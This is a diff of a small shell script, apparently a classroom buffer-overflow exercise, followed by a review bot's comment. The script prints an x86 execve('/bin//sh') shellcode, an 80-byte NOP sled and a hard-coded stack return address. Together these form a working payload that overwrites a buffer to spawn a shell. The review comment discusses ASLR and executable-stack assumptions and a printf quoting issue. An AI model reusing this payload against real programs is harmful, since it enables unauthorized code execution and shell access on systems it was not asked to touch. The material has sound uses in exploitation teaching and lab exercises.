1 #!/bin/sh |
1 #!/bin/sh |
2 |
2 |
3 // shellscript that overwrites the buffer with |
3 # shellscript that overwrites the buffer with |
4 // some payload for opening a shell (the payload |
4 # some payload for opening a shell (the payload |
5 // cannot contain any \x00) |
5 # cannot contain any \x00) |
6 |
6 |
7 |
7 |
8 shellcode="\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x99\x52\x53\x89\xe1\xb0\x0b\xcd\x80" |
8 shellcode="\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x99\x52\x53\x89\xe1\xb0\x0b\xcd\x80" |
9 |
9 |
10 # 24 bytes of shellcode |
10 # 24 bytes of shellcode |
21 # "\xb0\x0b" // movb $0xb,%al |
21 # "\xb0\x0b" // movb $0xb,%al |
22 # "\xcd\x80" // int $0x80 |
22 # "\xcd\x80" // int $0x80 |
23 |
23 |
24 padding=`perl -e 'print "\x90" x 80'` |
24 padding=`perl -e 'print "\x90" x 80'` |
25 |
25 |
26 // need s correct address in order to run |
26 # need s correct address in order to run |
27 printf $shellcode$padding"\xe8\xf8\xff\xbf\x00\x00\x00\x00" |
27 printf $shellcode$padding"\xe8\xf8\xff\xbf\x00\x00\x00\x00" |
28 |
28 |
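Review bot: The comment on new line 26 still reads `need s correct address in order to run`, and nothing says what the eight bytes appended on line 27 are or under which conditions they are valid. The value looks like a hard-coded 32-bit stack address, presumably tied to one lab binary, so the comment should state the assumptions, for example `# needs the return address of the buffer in the target lab build; only valid with ASLR off and an executable stack`. The header comment on lines 3-5 could name the exercise binary this input is meant for, so a reader can tell it is a fixed test vector rather than a general tool. Separately, line 27 passes unquoted variables to `printf` as the format string, and `\x` escapes in a format are not defined by POSIX, so the script should document which shell it expects behind `#!/bin/sh`.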